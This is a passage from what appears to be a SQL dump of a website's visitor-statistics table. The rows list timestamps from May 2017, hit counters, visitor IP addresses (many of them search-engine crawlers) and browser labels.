115627,1496029630,1,0,1,0,'68.180.230.48',''),(115628,1496029850,1,1,0,0,'51.255.71.128','other'),(115629,1496030067,1,0,1,0,'66.249.76.93',''),(115630,1496030117,1,0,1,0,'66.249.76.91',''),(115631,1496030123,1,0,1,0,'66.249.66.75',''),(115632,1496030195,1,0,1,0,'66.249.66.76',''),(115633,1496030200,1,1,0,0,'164.132.161.13','other'),(115634,1496030424,1,1,0,0,'8.29.198.26','other'),(115635,1496030633,1,1,0,0,'51.255.65.64','other'),(115636,1496031887,2,1,1,0,'66.249.66.156',''),(115637,1496032787,1,1,0,0,'217.182.132.34','other'),(115638,1496032952,1,1,0,0,'157.55.39.152','other'),(115639,1496033148,1,1,0,0,'51.255.65.97','other'),(115640,1496033321,1,0,1,0,'66.249.76.93',''),(115641,1496033468,1,1,0,0,'91.196.178.68','firefox'),(115642,1496033580,1,1,0,0,'91.196.178.163','chrome'),(115643,1496033597,1,0,1,0,'68.180.230.48',''),(115644,1496033702,1,1,0,0,'37.112.224.131','msie'),(115645,1496033834,1,1,0,0,'164.132.161.5','other'),(115646,1496033961,1,1,0,0,'141.8.142.15','other'),(115647,1496033965,1,1,0,0,'95.108.213.34','other'),(115648,1496034056,1,1,0,0,'51.255.65.66','other'),(115649,1496034172,1,0,1,0,'66.249.66.155',''),(115650,1496034380,1,1,0,0,'217.182.132.186','other'),(115651,1496034490,1,1,0,0,'91.196.178.66','firefox'),(115652,1496034824,1,1,0,0,'51.255.65.37','other'),(115653,1496034860,1,1,0,0,'164.132.161.31','other'),(115654,1496034861,1,1,0,0,'37.204.152.138','msie'),(115655,1496034991,1,1,0,0,'164.132.161.95','other'),(115656,1496035164,1,1,0,0,'128.69.148.63','msie'),(115657,1496035888,1,1,0,0,'188.244.33.208','msie'),(115658,1496035967,1,1,0,0,'51.255.71.114','other'),(115659,1496036094,1,1,0,0,'46.242.65.100','msie'),(115660,1496036481,2,0,2,0,'66.249.66.75',''),(115661,1496036872,1,1,0,0,'91.196.178.70','chrome'),(115662,1496036883,1,1,0,0,'217.182.132.76','other'),(115663,1496037141,1,1,0,0,'91.196.178.66','firefox'),(115664,1496037232,2,0,2,0,'66.249.76.93',''),(115665,1496037257,1,0,1,0,'66.249.76.91',''),(115666,1496037337,1,1,0,0,'217.182.132.85','other'),(115667,1496037751,9,9,0,0,'51.255.203.106','other'),(115668,1496037842,1,1,0,0,'164.132.161.34','other'),(115669,1496038099,1,1,0,0,'164.132.161.37','other'),(115670,1496038440,1,1,0,0,'157.55.39.152','other'),(115671,1496038538,1,1,0,0,'91.196.178.70','chrome'),(115672,1496038619,1,1,0,0,'217.182.132.187','other'),(115673,1496038792,1,1,0,0,'51.255.65.6','other'),(115674,1496038805,1,1,0,0,'217.182.132.27','other'),(115675,1496039018,1,1,0,0,'91.196.178.36','chrome'),(115676,1496039489,1,1,0,0,'164.132.161.65','other'),(115677,1496040270,1,1,0,0,'130.180.217.153','chrome'),(115678,1496040411,1,1,0,0,'51.255.71.131','other'),(115679,1496040515,1,1,0,0,'164.132.161.33','other'),(115680,1496040549,1,1,0,0,'46.160.76.32','chrome'),(115681,1496040575,1,1,0,0,'95.108.213.34','other'),(115682,1496040814,1,1,0,0,'164.132.161.3','other'),(115683,1496041242,1,1,0,0,'8.29.198.26','other'),(115684,1496041260,1,0,1,0,'66.249.76.91',''),(115685,1496041550,1,1,0,0,'51.255.71.114','other'),(115686,1496041743,1,1,0,0,'164.132.162.153','other'),(115687,1496041913,1,1,0,0,'164.132.161.83','other'),(115688,1496041991,1,1,0,0,'91.196.178.70','chrome'),(115689,1496042613,1,1,0,0,'66.249.76.93','chrome'),(115690,1496042741,1,1,0,0,'176.193.111.247','msie'),(115691,1496042842,1,1,0,0,'95.221.235.157','msie'),(115692,1496042980,1,1,0,0,'51.255.65.13','other'),(115693,1496042984,1,1,0,0,'178.95.247.243','firefox'),(115694,1496043170,1,1,0,0,'91.196.178.66','chrome'),(115695,1496043265,1,1,0,0,'91.196.177.46','chrome'),(115696,1496043446,1,1,0,0,'164.132.161.64','other'),(115697,1496043582,1,1,0,0,'51.255.65.41','other'),(115698,1496043699,1,1,0,0,'37.204.154.238','msie'),(115699,1496043703,1,1,0,0,'217.182.132.91','other'),(115700,1496043718,1,1,0,0,'51.255.65.27','other'),(115701,1496044090,1,1,0,0,'95.221.224.75','msie'),(115702,1496044098,1,1,0,0,'137.74.207.109','other'),(115703,1496044187,1,1,0,0,'95.134.72.36','firefox'),(115704,1496044441,1,1,0,0,'51.255.65.82','other'),(115705,1496044658,1,1,0,0,'91.196.177.46','chrome'),(115706,1496045049,1,1,0,0,'217.182.132.63','other'),(115707,1496045129,1,1,0,0,'94.254.240.54','chrome'),(115708,1496045363,1,1,0,0,'164.132.161.42','other'),(115709,1496045456,1,1,0,0,'51.255.65.42','other'),(115710,1496045759,1,1,0,0,'194.110.126.23','chrome'),(115711,1496045905,1,1,0,0,'164.132.161.78','other'),(115712,1496045932,1,1,0,0,'164.132.161.30','other'),(115713,1496045940,1,1,0,0,'128.69.148.63','msie'),(115714,1496046124,1,0,1,0,'66.249.66.75',''),(115715,1496046164,1,1,0,0,'164.132.162.156','other'),(115716,1496046437,1,1,0,0,'51.255.65.39','other'),(115717,1496046441,1,1,0,0,'157.55.39.167','other'),(115718,1496046662,1,1,0,0,'92.112.47.93','chrome'),(115719,1496046686,2,1,1,0,'66.249.76.108',''),(115720,1496046703,1,0,1,0,'66.249.76.107',''),(115721,1496046748,1,1,0,0,'51.255.71.115','other'),(115722,1496046930,1,1,0,0,'164.132.161.89','other'),(115723,1496047027,1,1,0,0,'164.132.162.154','other'),(115724,1496047054,1,1,0,0,'217.182.132.52','other'),(115725,1496047362,1,1,0,0,'93.74.212.147','firefox'),(115726,1496047405,1,1,0,0,'91.203.114.1','chrome'),(115727,1496048139,1,0,1,0,'66.249.76.89',''),(115728,1496048151,1,1,0,0,'51.255.65.10','other'),(115729,1496048400,1,1,0,0,'91.196.178.68','chrome'),(115730,1496048503,1,1,0,0,'51.255.65.63','other'),(115731,1496048660,1,1,0,0,'66.249.66.74','chrome'),(115732,1496048805,1,1,0,0,'91.196.178.69','chrome'),(115733,1496049301,1,1,0,0,'217.182.132.57','other'),(115734,1496049637,1,0,1,0,'66.249.76.108',''),(115735,1496049880,1,1,0,0,'137.74.203.194','other'),(115736,1496049958,1,1,0,0,'51.255.65.14','other'),(115737,1496050607,1,0,1,0,'66.249.76.109',''),(115738,1496050829,1,1,0,0,'91.196.178.132','firefox'),(115739,1496050965,1,1,0,0,'217.182.132.92','other'),(115740,1496051521,1,1,0,0,'91.196.178.70','chrome'),(115741,1496051656,1,1,0,0,'164.132.162.159','other'),(115742,1496051717,1,1,0,0,'217.182.132.74','other'),(115743,1496051718,1,1,0,0,'66.249.66.75','chrome'),(115744,1496051900,1,1,0,0,'66.249.76.89','chrome'),(115745,1496052064,1,1,0,0,'8.29.198.25','other'),(115746,1496052176,1,1,0,0,'66.249.76.107','chrome'),(115747,1496052189,2,0,2,0,'66.249.76.91',''),(115748,1496052309,1,1,0,0,'92.113.60.122','chrome'),(115749,1496052478,1,1,0,0,'51.255.65.84','other'),(115750,1496052570,1,1,0,0,'91.196.178.70','chrome'),(115751,1496052661,1,1,0,0,'66.249.66.157','chrome'),(115752,1496053022,1,0,1,0,'68.180.230.48',''),(115753,1496053141,1,1,0,0,'217.182.132.29','other'),(115754,1496053197,1,1,0,0,'91.196.178.70','other'),(115755,1496053424,1,0,1,0,'66.249.76.93',''),(115756,1496053443,2,0,2,0,'66.249.76.91',''),(115757,1496053469,1,0,1,0,'66.249.66.74',''),(115758,1496053542,1,1,0,0,'51.255.65.70','other'),(115759,1496053659,1,1,0,0,'51.255.65.3','other'),(115760,1496053761,1,1,0,0,'217.182.132.64','other'),(115761,1496053764,1,0,1,0,'66.249.76.89',''),(115762,1496053941,1,1,0,0,'217.182.132.25','other'),(115763,1496054034,1,1,0,0,'188.166.91.5','firefox'),(115764,1496054171,1,1,0,0,'217.182.132.15','other'),(115765,1496054194,1,1,0,0,'63.243.252.250','other'),(115766,1496054664,1,1,0,0,'91.196.178.168','chrome'),(115767,1496054902,1,1,0,0,'51.255.65.78','other'),(115768,1496055184,1,1,0,0,'91.196.179.25','firefox'),(115769,1496055210,1,1,0,0,'157.55.39.152','other'),(115770,1496055343,1,1,0,0,'94.45.147.67','chrome'),(115771,1496055397,1,1,0,0,'91.196.178.66','firefox'),(115772,1496055568,1,1,0,0,'51.255.65.55','other'),(115773,1496055632,2,2,0,0,'130.180.218.81','firefox'),(115774,1496055713,1,1,0,0,'164.132.161.90','other'),(115775,1496055761,1,1,0,0,'164.132.161.66','other'),(115776,1496056236,1,1,0,0,'91.196.177.46','firefox'),(115777,1496056562,1,0,1,0,'66.249.66.157',''),(115778,1496057053,1,0,1,0,'66.249.76.93',''),(115779,1496057147,2,2,0,0,'91.196.178.66','firefox'),(115780,1496057263,2,0,2,0,'66.249.76.109',''),(115781,1496057436,1,0,1,0,'66.249.76.89',''),(115782,1496057801,1,1,0,0,'130.180.218.64','firefox'),(115783,1496058418,1,1,0,0,'66.249.76.109','chrome'),(115784,1496058548,1,1,0,0,'164.132.161.57','other'),(115785,1496058660,1,1,0,0,'51.255.65.18','other'),(115786,1496058855,1,1,0,0,'217.182.132.34','other'),(115787,1496058908,1,1,0,0,'51.255.71.125','other'),(115788,1496058977,1,1,0,0,'217.182.132.170','other'),(115789,1496058986,1,1,0,0,'91.196.178.69','firefox'),(115790,1496059216,1,0,1,0,'66.249.76.93',''),(115791,1496059253,1,1,0,0,'164.132.161.8','other'),(115792,1496059536,1,1,0,0,'66.249.76.89','chrome'),(115793,1496059645,1,1,0,0,'37.52.16.65','chrome'),(115794,1496060354,1,1,0,0,'164.132.161.41','other'),(115795,1496060458,1,1,0,0,'193.19.152.14','firefox'),(115796,1496060541,1,0,1,0,'66.249.76.91',''),(115797,1496060706,1,1,0,0,'51.255.71.122','other'),(115798,1496060840,1,1,0,0,'193.107.72.66','chrome'),(115799,1496061095,1,1,0,0,'51.255.65.70','other'),(115800,1496061537,1,1,0,0,'51.255.65.80','other'),(115801,1496061636,1,1,0,0,'91.196.178.66','firefox'),(115802,1496061657,1,1,0,0,'157.55.39.152','other'),(115803,1496062036,1,1,0,0,'162.210.196.98','other'),(115804,1496062881,1,1,0,0,'8.29.198.25','other'),(115805,1496063020,1,1,0,0,'178.92.41.190','chrome'),(115806,1496063333,1,1,0,0,'91.196.178.66','firefox'),(115807,1496063417,1,1,0,0,'217.182.132.75','other'),(115808,1496064348,1,0,1,0,'66.249.66.75',''),(115809,1496064902,1,1,0,0,'178.92.41.190','chrome'),(115810,1496064956,1,1,0,0,'157.55.39.152','other'),(115811,1496064963,1,1,0,0,'188.166.84.233','chrome'),(115812,1496064998,2,2,0,0,'95.158.3.62','chrome'),(115813,1496065644,1,1,0,0,'77.123.57.237','chrome'),(115814,1496066150,1,0,1,0,'66.249.76.93',''),(115815,1496066778,1,0,1,0,'66.249.76.89',''),(115816,1496066804,1,0,1,0,'66.249.76.91',''),(115817,1496067350,2,2,0,0,'217.69.134.177','other'),(115818,1496067717,1,0,1,0,'66.249.76.109',''),(115819,1496067925,1,1,0,0,'217.69.134.175','other'),(115820,1496068468,1,1,0,0,'66.249.76.89','chrome'),(115821,1496068648,1,1,0,0,'5.58.62.223','opera'),(115822,1496068784,1,1,0,0,'217.182.132.178','other'),(115823,1496068908,1,1,0,0,'164.132.161.92','other'),(115824,1496069025,1,1,0,0,'157.55.39.152','other'),(115825,1496069043,1,1,0,0,'51.255.65.94','other'),(115826,1496069442,1,1,0,0,'51.255.65.50','other'),(115827,1496069513,1,1,0,0,'137.74.207.101','other'),(115828,1496069586,1,0,1,0,'66.249.76.93',''),(115829,1496069793,1,0,1,0,'66.249.76.107',''),(115830,1496069874,1,1,0,0,'66.249.76.91','chrome'),(115831,1496070254,1,1,0,0,'217.182.132.73','other'),(115832,1496070553,1,1,0,0,'185.182.81.78','chrome'),(115833,1496070583,1,1,0,0,'217.182.132.96','other'),(115834,1496070727,1,0,1,0,'68.180.230.48',''),(115835,1496071358,1,1,0,0,'178.62.128.67','firefox'),(115836,1496071891,1,1,0,0,'164.132.161.64','other'),(115837,1496072036,1,1,0,0,'217.182.132.176','other'),(115838,1496072040,1,1,0,0,'51.255.65.92','other'),(115839,1496072152,1,0,1,0,'66.249.66.156',''),(115840,1496072157,1,0,1,0,'66.249.76.89',''),(115841,1496072168,1,0,1,0,'68.180.230.48',''),(115842,1496073155,1,1,0,0,'51.255.65.65','other'),(115843,1496073349,1,1,0,0,'217.182.132.5','other'),(115844,1496073495,1,0,1,0,'66.249.76.91',''),(115845,1496073590,1,1,0,0,'115.88.236.234','firefox'),(115846,1496073701,1,1,0,0,'8.29.198.27','other'),(115847,1496073839,1,1,0,0,'157.55.39.167','other'),(115848,1496073959,1,1,0,0,'164.132.161.44','other'),(115849,1496074887,1,1,0,0,'164.132.161.2','other'),(115850,1496075124,1,1,0,0,'178.92.170.72','chrome'),(115851,1496075480,1,1,0,0,'217.182.132.29','other'),(115852,1496075549,1,1,0,0,'164.132.161.7','other'),(115853,1496075851,1,1,0,0,'212.90.179.174','chrome'),(115854,1496076665,1,1,0,0,'164.132.161.83','other'),(115855,1496076744,1,1,0,0,'51.255.65.80','other'),(115856,1496077097,1,1,0,0,'91.196.178.68','chrome'),(115857,1496077456,1,1,0,0,'51.255.71.112','other'),(115858,1496077484,1,1,0,0,'164.132.161.37','other'),(115859,1496077714,1,1,0,0,'164.132.161.71','other'),(115860,1496078188,1,1,0,0,'137.74.201.108','other'),(115861,1496078824,1,1,0,0,'5.255.253.63','other'),(115862,1496079189,1,1,0,0,'217.182.132.147','other'),(115863,1496079413,1,1,0,0,'46.211.248.103','chrome'),(115864,1496079898,1,1,0,0,'51.255.65.40','other'),(115865,1496080187,1,1,0,0,'207.46.13.118','other'),(115866,1496080492,1,1,0,0,'164.132.161.26','other'),(115867,1496080871,1,0,1,0,'66.249.76.93',''),(115868,1496080898,1,0,1,0,'66.249.76.91',''),(115869,1496081412,1,1,0,0,'217.182.132.5','other'),(115870,1496081807,1,1,0,0,'217.182.132.87','other'),(115871,1496081838,1,1,0,0,'164.132.161.78','other'),(115872,1496082090,1,1,0,0,'217.182.132.183','other'),(115873,1496082114,1,1,0,0,'51.255.65.11','other'),(115874,1496082515,1,1,0,0,'51.255.65.79','other'),(115875,1496082621,1,1,0,0,'51.255.65.52','other'),(115876,1496082901,1,1,0,0,'95.132.85.90','firefox'),(115877,1496083488,1,1,0,0,'164.132.161.77','other'),(115878,1496083716,1,1,0,0,'217.182.132.17','other'),(115879,1496083815,1,1,0,0,'66.249.66.195','chrome'),(115880,1496083874,1,1,0,0,'199.58.86.211','other'),(115881,1496084006,1,1,0,0,'51.255.65.16','other'),(115882,1496084513,1,0,1,0,'68.180.230.48',''),(115883,1496084522,1,1,0,0,'8.29.198.27','other'),(115884,1496085034,1,1,0,0,'51.255.65.61','other'),(115885,1496085488,1,0,1,0,'66.249.76.93',''),(115886,1496085493,1,0,1,0,'66.249.76.108',''),(115887,1496085508,1,0,1,0,'66.249.76.89',''),(115888,1496086403,1,1,0,0,'40.77.167.131','other'),(115889,1496086419,1,1,0,0,'164.132.161.68','other'),(115890,1496086639,1,1,0,0,'164.132.161.30','other'),(115891,1496086641,2,0,2,0,'66.249.66.156',''),(115892,1496086693,1,1,0,0,'207.46.13.118','other'),(115893,1496086698,1,1,0,0,'66.249.66.156','chrome'),(115894,1496086722,1,1,0,0,'95.108.213.34','other'),(115895,1496086737,1,1,0,0,'66.249.76.89','chrome'),(115896,1496087566,1,0,1,0,'66.249.64.157',''),(115897,1496087653,1,1,0,0,'164.132.161.94','other'),(115898,1496087881,1,1,0,0,'51.255.71.110','other'),(115899,1496087913,1,0,1,0,'68.180.230.48',''),(115900,1496088262,1,1,0,0,'51.255.65.73','other'),(115901,1496088448,1,0,1,0,'66.249.64.30',''),(115902,1496088660,1,1,0,0,'37.204.66.49','other'),(115903,1496088694,1,1,0,0,'51.255.65.93','other'),(115904,1496089423,1,1,0,0,'137.74.201.99','other'),(115905,1496089653,1,1,0,0,'91.196.178.168','chrome'),(115906,1496090015,1,1,0,0,'51.255.71.111','other'),(115907,1496090063,1,0,1,0,'68.180.230.48',''),(115908,1496090165,1,1,0,0,'91.196.178.162','chrome'),(115909,1496090180,1,1,0,0,'217.182.132.181','other'),(115910,1496090580,1,1,0,0,'40.77.167.131','other'),(115911,1496090902,1,1,0,0,'164.132.161.78','other'),(115912,1496091069,1,1,0,0,'217.182.132.177','other'),(115913,1496091123,1,1,0,0,'217.182.132.156','other'),(115914,1496091320,1,1,0,0,'217.182.132.187','other'),(115915,1496091384,1,0,1,0,'66.249.64.155',''),(115916,1496091552,1,0,1,0,'66.249.64.153',''),(115917,1496091660,1,1,0,0,'164.132.161.29','other'),(115918,1496092196,1,1,0,0,'51.255.65.48','other'),(115919,1496092225,1,1,0,0,'92.222.79.253','chrome'),(115920,1496092317,2,1,1,0,'66.249.64.30',''),(115921,1496092592,1,1,0,0,'51.255.65.94','other'),(115922,1496092908,1,1,0,0,'66.249.64.30','chrome'),(115923,1496093128,1,0,1,0,'66.249.64.29',''),(115924,1496093211,1,1,0,0,'217.182.132.30','other'),(115925,1496093541,1,0,1,0,'66.249.64.28',''),(115926,1496093857,1,1,0,0,'51.255.65.88','other'),(115927,1496093996,1,1,0,0,'164.132.161.69','other'),(115928,1496094151,1,1,0,0,'164.132.162.159','other'),(115929,1496094152,1,1,0,0,'217.182.132.94','other'),(115930,1496094667,1,1,0,0,'51.255.65.16','other'),(115931,1496094790,1,1,0,0,'91.209.11.236','other'),(115932,1496094889,1,0,1,0,'66.249.64.30',''),(115933,1496094989,1,0,1,0,'66.249.64.153',''),(115934,1496095207,1,1,0,0,'217.182.132.73','other'),(115935,1496095348,1,1,0,0,'8.29.198.26','other'),(115936,1496095351,2,1,1,0,'66.249.64.30',''),(115937,1496095783,1,0,1,0,'66.249.64.29',''),(115938,1496095785,1,1,0,0,'207.46.13.118','other'),(115939,1496095786,1,1,0,0,'164.132.161.16','other'),(115940,1496095852,1,0,1,0,'68.180.230.48',''),(115941,1496096059,1,1,0,0,'217.182.132.150','other'),(115942,1496096550,1,1,0,0,'164.132.161.55','other'),(115943,1496096600,1,0,1,0,'66.249.64.157',''),(115944,1496096629,2,0,2,0,'66.249.64.153',''),(115945,1496096750,2,0,2,0,'66.249.64.155',''),(115946,1496096789,1,1,0,0,'66.249.64.30','chrome'),(115947,1496096800,1,1,0,0,'51.255.65.70','other'),(115948,1496097032,1,1,0,0,'164.132.161.69','other'),(115949,1496097627,1,1,0,0,'164.132.161.45','other'),(115950,1496098966,1,1,0,0,'151.80.27.116','other'),(115951,1496099059,1,1,0,0,'78.111.186.197','chrome'),(115952,1496099588,1,1,0,0,'217.182.132.172','other'),(115953,1496099655,1,1,0,0,'164.132.161.22','other'),(115954,1496099802,1,1,0,0,'51.255.65.87','other'),(115955,1496099836,1,1,0,0,'51.255.71.123','other'),(115956,1496100032,1,0,1,0,'66.249.64.157',''),(115957,1496100092,1,0,1,0,'66.249.64.30',''),(115958,1496100448,1,1,0,0,'51.255.65.60','other'),(115959,1496100545,1,1,0,0,'137.74.207.108','other'),(115960,1496100622,1,1,0,0,'217.182.132.83','other'),(115961,1496100623,1,1,0,0,'151.80.27.118','other'),(115962,1496101247,1,1,0,0,'180.76.15.31','other'),(115963,1496101759,1,0,1,0,'66.249.64.155',''),(115964,1496102004,1,1,0,0,'164.132.161.76','other'),(115965,1496102923,1,0,1,0,'66.249.64.155',''),(115966,1496103218,1,1,0,0,'217.182.132.83','other'),(115967,1496103225,1,1,0,0,'137.74.207.102','other'),(115968,1496103389,2,0,2,0,'68.180.230.48',''),(115969,1496104527,1,1,0,0,'217.182.132.55','other'),(115970,1496104576,1,1,0,0,'164.132.161.95','other'),(115971,1496104733,1,0,1,0,'66.249.64.28',''),(115972,1496105219,1,1,0,0,'40.77.167.131','other'),(115973,1496105709,1,0,1,0,'66.249.64.28',''),(115974,1496105745,1,1,0,0,'157.55.39.152','other'),(115975,1496106172,1,1,0,0,'8.29.198.27','other'),(115976,1496106576,1,1,0,0,'164.132.161.17','other'),(115977,1496107009,1,1,0,0,'95.211.190.197','other'),(115978,1496107337,1,0,1,0,'66.249.64.155',''),(115979,1496107374,1,1,0,0,'164.132.161.40','other'),(115980,1496107518,1,1,0,0,'151.80.27.118','other'),(115981,1496107944,1,1,0,0,'217.182.132.176','other'),(115982,1496108006,1,0,1,0,'68.180.230.48',''),(115983,1496108044,1,1,0,0,'51.255.65.69','other'),(115984,1496108201,1,1,0,0,'51.255.65.87','other'),(115985,1496108419,1,1,0,0,'164.132.161.54','other'),(115986,1496108834,1,1,0,0,'164.132.161.11','other'),(115987,1496109063,1,1,0,0,'164.132.161.88','other'),(115988,1496109315,1,0,1,0,'66.249.64.28',''),(115989,1496110023,1,1,0,0,'51.255.65.92','other'),(115990,1496110338,1,1,0,0,'164.132.161.20','other'),(115991,1496110947,1,0,1,0,'66.249.64.30',''),(115992,1496111044,1,1,0,0,'66.249.64.153','chrome'),(115993,1496111058,1,0,1,0,'66.249.64.28',''),(115994,1496111294,1,1,0,0,'51.255.71.111','other'),(115995,1496111348,1,0,1,0,'66.249.64.157',''),(115996,1496111401,1,1,0,0,'217.182.132.181','other'),(115997,1496111536,1,1,0,0,'66.249.64.30','chrome'),(115998,1496111848,1,1,0,0,'217.182.132.62','other'),(115999,1496112048,1,1,0,0,'51.255.65.41','other'),(116000,1496112433,1,1,0,0,'164.132.161.82','other'),(116001,1496112713,1,0,1,0,'66.249.64.28',''),(116002,1496112780,1,1,0,0,'51.255.65.19','other'),(116003,1496112825,1,0,1,0,'66.249.64.153',''),(116004,1496112845,2,0,2,0,'66.249.64.155',''),(116005,1496112927,2,1,1,0,'66.249.64.29',''),(116006,1496113551,1,0,1,0,'66.249.64.157',''),(116007,1496113706,1,1,0,0,'164.132.161.74','other'),(116008,1496113840,2,2,0,0,'65.19.167.134','chrome'),(116009,1496113989,1,1,0,0,'217.182.132.29','other'),(116010,1496114862,1,1,0,0,'51.255.65.71','other'),(116011,1496115368,1,1,0,0,'51.255.65.69','other'),(116012,1496115457,1,1,0,0,'40.77.167.131','other'),(116013,1496115478,1,1,0,0,'164.132.161.82','other'),(116014,1496115538,1,1,0,0,'51.255.65.29','other'),(116015,1496115602,1,0,1,0,'66.249.64.30',''),(116016,1496115729,1,1,0,0,'217.182.132.73','other'),(116017,1496115774,1,1,0,0,'157.55.39.152','other'),(116018,1496116628,1,1,0,0,'51.255.65.72','other'),(116019,1496116903,1,1,0,0,'51.255.65.42','other'),(116020,1496117006,1,1,0,0,'8.29.198.27','other'),(116021,1496117039,1,1,0,0,'51.255.65.59','other'),(116022,1496117232,1,1,0,0,'164.132.161.71','other'),(116023,1496117450,1,1,0,0,'51.255.65.43','other'),(116024,1496117741,1,1,0,0,'164.132.161.10','other'),(116025,1496117860,1,1,0,0,'137.74.207.101','other'),(116026,1496118121,1,1,0,0,'66.249.64.28','chrome'),(116027,1496118833,1,1,0,0,'188.32.144.193','chrome'),(116028,1496118975,1,1,0,0,'217.182.132.59','other'),(116029,1496119737,1,1,0,0,'217.182.132.32','other'),(116030,1496119931,1,1,0,0,'91.196.178.67','firefox'),(116031,1496119978,1,1,0,0,'217.182.132.175','other'),(116032,1496120124,1,1,0,0,'164.132.161.67','other'),(116033,1496120273,1,1,0,0,'164.132.161.29','other'),(116034,1496120428,1,1,0,0,'164.132.161.25','other'),(116035,1496120456,1,0,1,0,'68.180.230.48',''),(116036,1496120618,1,0,1,0,'66.249.64.30',''),(116037,1496120629,2,0,2,0,'66.249.64.155',''),(116038,1496121122,1,1,0,0,'217.182.132.175','other'),(116039,1496121189,1,1,0,0,'217.182.132.184','other'),(116040,1496121382,2,2,0,0,'137.74.207.101','other'),(116041,1496121562,1,1,0,0,'164.132.162.164','other'),(116042,1496121595,1,0,1,0,'66.249.64.28',''),(116043,1496122501,1,1,0,0,'178.255.215.94','other'),(116044,1496122573,1,1,0,0,'51.255.65.36','other'),(116045,1496122574,1,1,0,0,'66.249.64.29','chrome'),(116046,1496122623,1,0,1,0,'66.249.76.109',''),(116047,1496122769,1,1,0,0,'164.132.161.34','other'),(116048,1496123075,1,0,1,0,'66.249.64.30',''),(116049,1496123411,1,1,0,0,'51.255.65.31','other'),(116050,1496123538,1,1,0,0,'185.80.220.42','chrome'),(116051,1496123749,1,1,0,0,'178.94.15.181','msie'),(116052,1496123827,1,0,1,0,'66.249.64.155',''),(116053,1496123925,1,1,0,0,'217.182.132.14','other'),(116054,1496124000,1,1,0,0,'91.196.178.70','chrome'),(116055,1496124019,1,1,0,0,'51.255.65.10','other'),(116056,1496124318,1,1,0,0,'217.182.132.30','other'),(116057,1496124423,10,10,0,0,'173.234.153.122','other'),(116058,1496124467,1,1,0,0,'164.132.161.65','other'),(116059,1496124910,1,0,1,0,'66.249.64.153',''),(116060,1496125209,1,0,1,0,'66.249.64.29',''),(116061,1496125260,1,1,0,0,'51.255.71.131','other'),(116062,1496125337,1,1,0,0,'185.80.220.42','chrome'),(116063,1496125650,1,1,0,0,'91.196.177.110','chrome'),(116064,1496125986,1,1,0,0,'66.102.9.27','chrome'),(116065,1496126938,1,1,0,0,'95.132.59.67','firefox'),(116066,1496127139,1,1,0,0,'185.80.220.42','chrome'),(116067,1496127493,1,1,0,0,'80.254.155.43','chrome'),(116068,1496127511,1,1,0,0,'130.180.219.188','chrome'),(116069,1496127827,2,0,2,0,'68.180.230.48',''),(116070,1496127839,1,1,0,0,'8.29.198.25','other'),(116071,1496128326,1,1,0,0,'157.55.39.152','other'),(116072,1496128482,1,0,1,0,'66.249.64.153',''),(116073,1496128742,1,1,0,0,'95.108.181.13','other'),(116074,1496128749,1,1,0,0,'178.154.149.3','other'),(116075,1496128937,1,1,0,0,'185.80.220.42','chrome'),(116076,1496128974,1,0,1,0,'66.249.64.157',''),(116077,1496129690,1,1,0,0,'91.196.178.168','chrome'),(116078,1496129901,1,0,1,0,'66.249.64.29',''),(116079,1496130092,1,1,0,0,'91.196.178.70','chrome'),(116080,1496130169,1,0,1,0,'66.249.64.28',''),(116081,1496130737,1,1,0,0,'185.80.220.42','chrome'),(116082,1496130827,2,1,1,0,'66.249.64.155',''),(116083,1496131099,1,1,0,0,'78.111.190.250','chrome'),(116084,1496131209,1,0,1,0,'66.249.64.153',''),(116085,1496131217,1,1,0,0,'95.133.34.77','chrome'),(116086,1496131772,2,2,0,0,'46.4.0.246','other'),(116087,1496132038,1,1,0,0,'157.55.39.152','other'),(116088,1496132538,1,1,0,0,'185.80.220.42','chrome'),(116089,1496132607,1,1,0,0,'95.132.59.67','firefox'),(116090,1496132714,1,1,0,0,'37.55.178.242','chrome'),(116091,1496132796,1,1,0,0,'178.255.215.94','other'),(116092,1496133110,1,1,0,0,'180.76.15.28','other'),(116093,1496133234,1,1,0,0,'91.196.178.168','chrome'),(116094,1496133337,1,0,1,0,'66.249.64.153',''),(116095,1496133853,1,1,0,0,'46.201.175.251','chrome'),(116096,1496133981,1,1,0,0,'193.19.152.77','chrome'),(116097,1496133998,1,0,1,0,'66.249.64.28',''),(116098,1496134338,1,1,0,0,'185.80.220.42','chrome'),(116099,1496134528,1,1,0,0,'91.196.178.131','firefox'),(116100,1496134982,1,0,1,0,'66.249.64.28',''),(116101,1496135721,1,0,1,0,'66.249.64.29',''),(116102,1496135744,1,0,1,0,'66.249.64.155',''),(116103,1496135779,2,0,2,0,'66.249.64.153',''),(116104,1496136772,1,1,0,0,'95.132.40.185','chrome'),(116105,1496137189,1,1,0,0,'62.212.73.211','other'),(116106,1496137270,1,1,0,0,'178.95.247.243','firefox'),(116107,1496138049,1,1,0,0,'51.255.65.84','other'),(116108,1496138310,1,1,0,0,'66.249.64.30','chrome'),(116109,1496138662,1,1,0,0,'8.29.198.27','other'),(116110,1496138904,1,0,1,0,'66.249.64.157',''),(116111,1496139132,1,1,0,0,'164.132.161.6','other'),(116112,1496139440,1,1,0,0,'91.196.178.163','chrome'),(116113,1496139473,1,1,0,0,'217.182.132.58','other'),(116114,1496139976,1,0,1,0,'66.249.64.157',''),(116115,1496140067,1,1,0,0,'164.132.161.75','other'),(116116,1496140645,1,1,0,0,'185.137.18.147','chrome'),(116117,1496140676,1,1,0,0,'141.8.142.15','other'),(116118,1496141127,1,1,0,0,'51.255.65.85','other'),(116119,1496141229,1,1,0,0,'164.132.161.53','other'),(116120,1496141320,1,1,0,0,'51.255.65.83','other'),(116121,1496141364,1,1,0,0,'91.196.178.163','chrome'),(116122,1496141836,1,1,0,0,'217.182.132.151','other'),(116123,1496142356,1,1,0,0,'188.166.25.25','firefox'),(116124,1496143218,1,0,1,0,'66.249.64.155',''),(116125,1496143341,1,1,0,0,'164.132.161.31','other'),(116126,1496143954,1,1,0,0,'157.55.39.167','other'),(116127,1496144066,1,1,0,0,'66.249.64.155','chrome'),(116128,1496144237,1,1,0,0,'46.200.117.199','chrome'),(116129,1496144390,1,1,0,0,'66.249.64.29','chrome'),(116130,1496144406,1,0,1,0,'66.249.64.30',''),(116131,1496144970,1,1,0,0,'164.132.161.82','other'),(116132,1496145021,1,1,0,0,'164.132.161.75','other'),(116133,1496145563,1,1,0,0,'137.74.203.194','other'),(116134,1496145576,1,0,1,0,'66.249.64.157',''),(116135,1496145903,1,1,0,0,'91.196.178.66','chrome'),(116136,1496146089,1,1,0,0,'178.95.247.243','firefox'),(116137,1496146810,1,1,0,0,'51.255.65.27','other'),(116138,1496146936,1,1,0,0,'217.23.11.65','chrome'),(116139,1496147051,1,1,0,0,'178.95.